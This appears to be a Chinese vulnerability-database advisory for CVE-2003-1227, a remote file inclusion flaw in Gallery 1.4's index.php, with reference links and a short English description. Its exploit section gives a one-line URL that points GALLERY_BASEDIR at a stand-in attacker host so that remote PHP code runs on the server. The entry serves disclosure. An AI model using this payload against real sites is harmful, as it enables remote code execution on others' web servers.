Gallery index.php远程文件列入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107509 漏洞类型 代码注入
发布时间 2003-10-11 更新时间 2006-08-17
CVE编号 CVE-2003-1227 CNNVD-ID CNNVD-200312-234
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/23238
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-234
|漏洞详情
Gallery1.4和1.4-pl1版本的index.php存在PHP远程文件列入漏洞,当运行在Windows或者Unix上的默认模式时,远程攻击者通过修改GALLERY_BASEDIR参数指向一个恶意的util.php文件从而导致注入任意PHP代码,该漏洞与CVE-2002-1412不同。
|漏洞EXP
source: http://www.securityfocus.com/bid/8814/info

It has been reported that Gallery is prone to a remote file include vulnerability in the index.php script file. The problem occurs due to the program failing to verify the location in which it includes the util.php script, when handling specific requests to index.php. As a result, an attacker may be capable of having arbitrary PHP script code being executed on the remote host with the privileges of the web server. 

http://www.example.org/path_to_gallery/setup/index.php?GALLERY_BASEDIR=http://www.attacker.com/
|参考资料

来源:BID
名称:8814
链接:http://www.securityfocus.com/bid/8814
来源:BUGTRAQ
名称:20031011Gallery1.4includingfilevulnerability
链接:http://www.securityfocus.com/archive/1/341044
来源:XF
名称:gallery-indexphp-file-include(13419)
链接:http://xforce.iss.net/xforce/xfdb/13419
来源:BUGTRAQ
名称:20031012Re:Gallery1.4includingfilevulnerability
链接:http://www.securityfocus.com/archive/1/341098
来源:BUGTRAQ
名称:20031011RE:Gallery1.4includingfilevulnerability
链接:http://www.securityfocus.com/archive/1/341094